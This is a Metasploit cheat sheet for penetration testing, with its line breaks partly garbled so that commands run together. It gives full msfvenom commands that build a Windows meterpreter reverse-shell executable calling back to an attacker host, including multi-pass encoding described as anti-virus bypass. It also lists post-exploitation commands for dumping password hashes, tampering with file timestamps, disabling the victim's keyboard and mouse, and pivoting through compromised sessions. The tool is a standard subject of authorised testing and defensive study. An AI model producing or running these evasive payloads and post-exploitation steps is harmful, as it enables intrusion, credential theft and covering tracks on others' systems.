Metasploit Project is a computer security project which provide information about vulnerabilities. Help in the development of penetration tests and IDS signatures, metasploit is very popular tool used by pentest experts.
msf > search [regex]msf > use exploit/[ExploitPath]msf > set PAYLOAD [PayloadPath]msf > show optionsmsf > set [Option] [Value]msf > exploit msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.10.0/24
msf > runmsf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > runmsf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > runmsf > use auxiliary/server/socks4
msf > run msfvenom this is tool can be used to generate Metasploit payloads as standalone files and optionally encode them. This tool replaces msfpayload and msfencode tools. Run with ‘'-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=192.168.1.1
LPORT=4444 > met.exe-
-exe– Executable-pl– Perl-rb– Ruby-raw– Raw shellcode-c– C code
msfvenom can be used to apply a level of encoding for anti-virus bypass. For example run msfvenom with -l encoders to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=192.168.1.1 LPORT=4444 > mal.exe-
-
? / help: Display a summary of commands exit / quit: Exit the Meterpreter session -
sysinfo: Show the system name and OS type -
shutdown / reboot: Self-explanatory
-
-
-
cd: Change directory -
lcd: Change directory on local (attacker's) machine -
pwd / getwd: Display current working directory -
ls: Show the contents of the directory -
cat: Display the contents of a file on screen -
download / upload: Move files to/from the target machine -
mkdir / rmdir: Make / remove directory -
edit: Open a file in the default editor (typically vi)
-
-
-
getpid: Display the process ID that Meterpreter is running inside. -
getuid: Display the user ID that Meterpreter is running with. -
ps: Display process list. -
kill: Terminate a process given its process ID. -
execute: Run a given program with the privileges of the process the Meterpreter is loaded in. -
migrate: Jump to a given destination process ID
-
-
-
ipconfig: Show network interface information -
portfwd: Forward packets through TCP session -
route: Manage/view the system's routing table
-
-
-
idletime: Display the duration that the GUI of thetarget machine has been idle. -
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine. -
screenshot: Save as an image a screenshot of the target machine.
-
-
-
use [module]: Load the specified module-
Examples:
-
use priv: Load the priv module -
hashdump: Dump the hashes from the box -
timestomp: Alter NTFS file timestamps
-
-
-
msf > exploit -zmsf > exploit –jmsf > jobs –lmsf > jobs –k [JobID]msf > sessions -lmsf > session -i [SessionID]meterpreter > <Ctrl+Z>or
meterpreter > backgroundAll modules against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]